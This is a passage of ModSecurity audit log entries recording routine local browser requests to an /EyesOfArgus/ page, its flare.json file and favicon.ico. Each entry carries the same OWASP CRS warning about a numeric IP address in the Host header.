GMT","ETag":"\"cca-54f6a973816fe-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1217","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc43X8AAQEAABwQSB4AAAAD\"]"],"stopwatch":{"p1":631,"p2":950,"p3":63,"p4":324,"p5":54,"sr":28,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:48:29 --0400","transaction_id":"WRc43X8AAQEAABwQSB8AAAAD","remote_address":"127.0.0.1","remote_port":42692,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:48:27 GMT","ETag":"\"295-54f6a974c6a29\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc43X8AAQEAABwQSB8AAAAD\"]"],"stopwatch":{"p1":434,"p2":944,"p3":51,"p4":141,"p5":55,"sr":19,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:48:30 --0400","transaction_id":"WRc43n8AAQEAABwQSCAAAAAD","remote_address":"127.0.0.1","remote_port":42692,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc43n8AAQEAABwQSCAAAAAD\"]"],"stopwatch":{"p1":539,"p2":1169,"p3":50,"p4":238,"p5":51,"sr":23,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:48:30 --0400","transaction_id":"WRc43n8AAQEAABwQSCEAAAAD","remote_address":"127.0.0.1","remote_port":42692,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc43n8AAQEAABwQSCEAAAAD\"]"],"stopwatch":{"p1":416,"p2":1009,"p3":48,"p4":251,"p5":49,"sr":16,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:02 --0400","transaction_id":"WRc4-n8AAQEAABwRiHcAAAAE","remote_address":"127.0.0.1","remote_port":42706,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":301,"headers":{"Location":"http://127.0.0.1/EyesOfArgus/","Content-Length":"312","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>301 Moved Permanently</title>\n</head><body>\n<h1>Moved Permanently</h1>\n<p>The document has moved <a href=\"http://127.0.0.1/EyesOfArgus/\">here</a>.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus\"] [unique_id \"WRc4-n8AAQEAABwRiHcAAAAE\"]"],"handler":"httpd/unix-directory","stopwatch":{"p1":872,"p2":1628,"p3":75,"p4":412,"p5":98,"sr":66,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:02 --0400","transaction_id":"WRc4-n8AAQEAABwRiHgAAAAE","remote_address":"127.0.0.1","remote_port":42706,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:48:58 GMT","ETag":"\"cca-54f6a992c662d-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1215","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc4-n8AAQEAABwRiHgAAAAE\"]"],"stopwatch":{"p1":635,"p2":1316,"p3":88,"p4":465,"p5":115,"sr":25,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:03 --0400","transaction_id":"WRc4-38AAQEAABwRiHkAAAAE","remote_address":"127.0.0.1","remote_port":42706,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:49:00 GMT","ETag":"\"295-54f6a9943f572\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc4-38AAQEAABwRiHkAAAAE\"]"],"stopwatch":{"p1":385,"p2":938,"p3":57,"p4":134,"p5":60,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:03 --0400","transaction_id":"WRc4-38AAQEAABwRiHoAAAAE","remote_address":"127.0.0.1","remote_port":42706,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4-38AAQEAABwRiHoAAAAE\"]"],"stopwatch":{"p1":411,"p2":883,"p3":59,"p4":242,"p5":51,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:03 --0400","transaction_id":"WRc4-38AAQEAABwRiHsAAAAE","remote_address":"127.0.0.1","remote_port":42706,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4-38AAQEAABwRiHsAAAAE\"]"],"stopwatch":{"p1":641,"p2":1445,"p3":333,"p4":433,"p5":52,"sr":33,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:43 --0400","transaction_id":"WRc5J38AAQEAABzhe1QAAAAF","remote_address":"127.0.0.1","remote_port":42720,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":301,"headers":{"Location":"http://127.0.0.1/EyesOfArgus/","Content-Length":"312","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>301 Moved Permanently</title>\n</head><body>\n<h1>Moved Permanently</h1>\n<p>The document has moved <a href=\"http://127.0.0.1/EyesOfArgus/\">here</a>.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file 